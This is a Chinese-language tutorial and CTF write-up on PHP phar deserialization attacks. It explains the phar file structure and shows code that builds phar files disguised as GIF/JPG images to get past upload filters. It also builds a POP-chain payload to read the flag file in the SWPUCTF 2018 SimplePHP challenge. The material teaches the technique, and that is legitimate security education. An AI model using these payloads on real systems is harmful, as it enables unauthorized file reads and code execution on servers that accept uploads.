反序列化篇之phar反序列化

phar反序列化

曾经我对于phar的印象,也就是知道好像有个phar://的伪协议,可以将任意后缀名的压缩包解包,从而可以通过上传压缩包绕过对后缀名的限制,再利用伪协议实现文件包含;后来我才知道,利用phar文件包还可以发起反序列化,使PHP反序列化漏洞的利用面更宽广了

1.phar文件结构

phar是啥?简单的说phar就是php的压缩文件,多个php代码文件和其他资源可以压缩进一个phar文件中,而且不用经过解压就可以被php直接访问,这里是利用phar://伪协议去打开压缩文件的,和jar很像,phar是一种打包文件;之所以会出现phar反序列化漏洞是因为phar文件是以序列化的形式存储用户自定义的meta-data,而当它以流的形式打开的时候,会自动反序列化,相当于也可以在没有unserialize()函数的情况下自动实现反序列化,这个我们后面再慢慢讲,一个phar文件是由四部分组成的:

1.stub:可以理解为是phar文件的标志,就像GIF89a是图片头一样,它的格式为:xxxxx<?php xxx; __HALT_COMPILER();?>,前面内容没有限制,什么都行,只是结尾必须是__HALT_COMPILER();?>,否则将不能被识别为phar文件

2.manifest describing the contents:这里存放着压缩文件的信息,每个被压缩文件的权限,属性等信息都放在这里,这里还会以序列化的形式存储着用户自定义的meta-data,这里是phar反序列化攻击最核心的地方,因为这儿是我们可控的,我们就可以将够我们精心构造好的exp放在这里

3.the file contents:被压缩文件的内容,这个随便是啥都不影响

4.signature for verifying Phar integrity:签名,放在文件末尾

其实这四条只有前面两条比较重要,后两条都是来打酱油的,总结下来就是两点:一是文件标识,必须以__HALT_COMPILER();?>结尾,但前面的内容是没有限制的,也就是说我们可以构造一个图片文件或者pdf文件来绕过上传的限制,将这个phar文件上传上去;二是phar文件存储meta-data时会先将内容序列化后再存入进去,当文件操作函数通过phar://伪协议解析phar文件时就会先将数据反序列化,这样就可以构成反序列化攻击,而文件操作函数有很多,下面就讲它

2.文件操作函数

文件操作函数就是php中拿来操作文件的函数,比如说像file_get_contents()file_put_contents()函数这样用来读写文件的函数,常见的文件操作函数如下:

1
2
3
fileatime filectime file_exists file_get_contents file_put_contents file filegroup fopen 
fileinode filemtime fileowner fileperms is_dir is_executable is_file is_link is_readable
is_writable is_writeable parse_ini_file copy unlink start readfile

可能会有漏掉的

3.phar文件生成测试

讲了这么久的phar文件,可它到底长什么样儿呢?我们还没形象的见过呢,接下来我们就来生成一个phar文件,看看它到底长啥样, 注意这里需要先将php.ini中的phar.readonly选项设置为Off,并且删掉前面的分号,然后记得重启一下phpstudy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
highlight_file(__FILE__);
header("Content-Type:text/html;charset=utf-8");
class Test{
public $name='ArseneTang';
}
$a = new Test();
$phar = new Phar("phar.phar"); //生成一个phar文件,名字为phar.phar
$phar -> startBuffering(); //下面细讲
$phar -> setStub("<?php __HALT_COMPILER(); ?>"); //设置stub头
$phar -> setMetadata($a); //将创建的对象a写入到Metadata中
$phar -> addFromString("test.txt","testaaa"); //添加要进行压缩的文件,文件名为test,文件内容为testaaa
$phar -> stopBuffering();//下面细讲
?>

我们先来看看startBuffering()stopBuffering()是干啥的,看看php手册就行,其实我们只需要知道在创建Phar文件前记得先startBuffering,在写入结束之后记得stopBuffering停止缓冲就行

image.png

image.png

好了,然后我们运行上面那段代码就可以生成phar文件了:

image.png

发现成功生成了,接下来看看它长啥样,发现我们写入的meta-data确实是以序列化的形式存储的:

image.png

而我们前面说过,当php文件操作函数通过phar://伪协议解析phar文件时会先自动先将meta-data进行反序列化,这里就不难理解为什么不需要unserialize()就可以发起反序列化攻击了,因为它是自动反序列化的嘛

4.简单例题测试

接下来我们就简单的用一个例题来测试下,首先是存在漏洞的代码test1.php

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);
error_reporting(0);
class Test{
public $code;
public function __destruct(){
eval($this -> code);
}
}
$filename = $_GET['filename'];
file_get_contents($filename);
?>

然后我们就来生成phar文件,运行下面的代码,生成a.phar

1
2
3
4
5
6
7
8
9
10
11
12
<?php
class Test{
public $code = 'phpinfo();';
}
$a = new Test();
$phar = new Phar("a.phar");
$phar -> startBuffering();
$phar -> setStub("<?php __HALT_COMPILER(); ?>");
$phar -> setMetadata($a);
$phar -> addFromString("test.txt","aaatest");
$phar -> stopBuffering();
?>

然后我们本来应该把这个phar文件上传上去然后再用phar://伪协议去解析它,这里因为是本地测试,我们就不搞那么麻烦了,我们直接把生成的phar文件放到test1.php的目录下,然后直接用相对路径就行,phar://a.phar/test.txt

image.png

但在实际的利用中,我们是需要把文件上传上去的,而存在文件上传的地方一般都会有限制,可能是白名单过滤并且会检测该文件是不是图片文件,如果遇到这种情况我们就可以伪造一个GIF89a的文件头,并且把后缀改成jpg来绕过过滤,因为phar://可以解析任意后缀名

1
2
3
4
5
6
7
8
9
10
11
12
<?php
class Test{
public $code = 'phpinfo();';
}
$a = new Test();
$phar = new Phar("b.phar");
$phar -> startBuffering();
$phar -> setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar -> setMetadata($a);
$phar -> addFromString("test.txt","aaatest");
$phar -> stopBuffering();
?>

就这样生成,生成的b.phar就是一个图片文件了,再把后缀改成jpg就行了:

image.png

image.png

没有问题,成功解析

5.SWPUCTF 2018 SimplePHP

这次选择的例题是SWPUCTF2018年的SimplePHP,我觉得这题是真的出的好,既考了pop链也考了phar反序列化,难度也很合适,题目可以在buuctf上面复现

进去之后有个查看文件的功能和上传文件的功能,我们先点击查看文件的功能把里面的文件看看,一些比较重要的文件如下:

function.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php 
//show_source(__FILE__);
include "base.php";
header("Content-type: text/html;charset=utf-8");
error_reporting(0);
function upload_file_do() {
global $_FILES;
$filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg";
//mkdir("upload",0777);
if(file_exists("upload/" . $filename)) {
unlink($filename);
}
move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename);
echo '<script type="text/javascript">alert("上传成功!");</script>';
}
function upload_file() {
global $_FILES;
if(upload_file_check()) {
upload_file_do();
}
}
function upload_file_check() {
global $_FILES;
$allowed_types = array("gif","jpeg","jpg","png");
$temp = explode(".",$_FILES["file"]["name"]);
$extension = end($temp);
if(empty($extension)) {
//echo "<h4>请选择上传的文件:" . "<h4/>";
}
else{
if(in_array($extension,$allowed_types)) {
return true;
}
else {
echo '<script type="text/javascript">alert("Invalid file!");</script>';
return false;
}
}
}
?>

这里是上传页面的源码,可以看到它是一个后缀白名单验证,能用的后缀只有gif、jpeg、jpg、png,并且文件名我们也知道,然后看文件路径,是在upload/目录下的,那看来这些上传信息我们都知道,成功希望很大哈哈哈

class.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
<?php
class C1e4r
{
public $test;
public $str;
public function __construct($name)
{
$this->str = $name;
}
public function __destruct()
{
$this->test = $this->str;
echo $this->test;
}
}

class Show
{
public $source;
public $str;
public function __construct($file)
{
$this->source = $file; //$this->source = phar://phar.jpg
echo $this->source;
}
public function __toString()
{
$content = $this->str['str']->source;
return $content;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}

}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class Test
{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)
{
return $this->get($key);
}
public function get($key)
{
if(isset($this->params[$key])) {
$value = $this->params[$key];
} else {
$value = "index.php";
}
return $this->file_get($value);
}
public function file_get($value)
{
$text = base64_encode(file_get_contents($value));
return $text;
}
}
?>

这里应该是反序列化的核心地方了,我们得先把pop链找出来才能继续操作,具体找pop链子的方法可以看看我之前写的文章,这里还是简单分析一下,首先还是从尾部开始,找找哪里可以读flag,发现在Show类中的_show()函数以及Test类中的file_get()函数都可以读取文件,但Show类中的_show()函数中禁掉了f1ag,恐怕绕不过去,而且这道题是phar反序列化,肯定需要一个文件操作函数,而Test类中的file_get()函数里面正好有file_get_contents(),这就很明显了,很明显链子的尾部在这里,然后往前推,在Test类中的get()调用了它,然后Test类中的__get()调用了get(),然后往前看哪里可以调用__get(),在Show类中的__toString()可以调用它,再往前看,C1r4r类中的__destruct()有个echo $this->test,如果把它实例化成一个对象就可以调用__toString(),这样一条完整的pop链就出来了:

头->C1e4r::__destruct() -> Show::toString() -> Test::__get() -> Test::get() -> Test::file_get()->尾

有了pop链就直接开始构造吧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
class C1e4r
{
public $test;
public $str;
}

class Show
{
public $source;
public $str;
}
class Test
{
public $file;
public $params = array('source' => '/var/www/html/f1ag.php');
}
$a = new C1e4r();
$b = new Show();
$c = new Test();
$a -> str = $b;
$b -> str['str'] = $c;
echo serialize($a);
?>

咱先看看它序列化出来长啥样,其实这一步也可以省略,直接写入phar文件也行,但这里想看看以防出问题:

image.png

应该是没啥问题的,那我们就把它写入phar文件中了,这里记得添加GIF89a的文件头哈,然后它上传上去的文件名是我们本身的文件名加上$_SERVER["REMOTE_ADDR"]的值再整体md5加密后的值,这里我们也把它输出出来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
highlight_file(__FILE__);
class C1e4r
{
public $test;
public $str;
}

class Show
{
public $source;
public $str;
}
class Test
{
public $file;
public $params = array('source' => '/var/www/html/f1ag.php');
}
$a = new C1e4r();
$b = new Show();
$c = new Test();
$a -> str = $b;
$b -> str['str'] = $c;
$phar = new Phar("swpu.phar");
$phar -> startBuffering();
$phar -> setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar -> setMetadata($a);
$phar -> addFromString("test.txt", "testaaa");
$phar -> stopBuffering();
echo "<br>";
echo(md5('swpu.jpg125.70.254.68'));
?>

运行这个文件,成功生成了swpu.phar,然后把它改名改成swpu.jpg,在上传页面进行上传,成功上传上去

image.png

image.png

然后在file.phpphar://伪协议来解析它,文件的路径为upload/71cb3247543c58c069b4f9d7eee78130.jpg,所以说最后就是:phar://upload/71cb3247543c58c069b4f9d7eee78130.jpg

image.png

成功拿下,这道题难度其实也还好,只要找出了pop链应该就能出来

6.总结

这篇文章的最后我们来总结一下phar反序列化的利用条件:

1.phar文件要能上传到服务器端,并且要知道传上去的路径,如果根本不能传或者不知道传哪儿去了,这都很难利用

2.文件操作函数的参数要可控

3.通过文件操作函数之后要有合适的魔术方法,一般是__wakeup()或者__destruct()

4.phar/:等特殊字符不能被过滤掉

参考文章:

https://paper.seebug.org/680/

https://websec.readthedocs.io/zh/latest/language/php/phar.html

https://guokeya.github.io/post/swpuctf-2018simplephppop-lian-phar-fan-xu-lie-hua/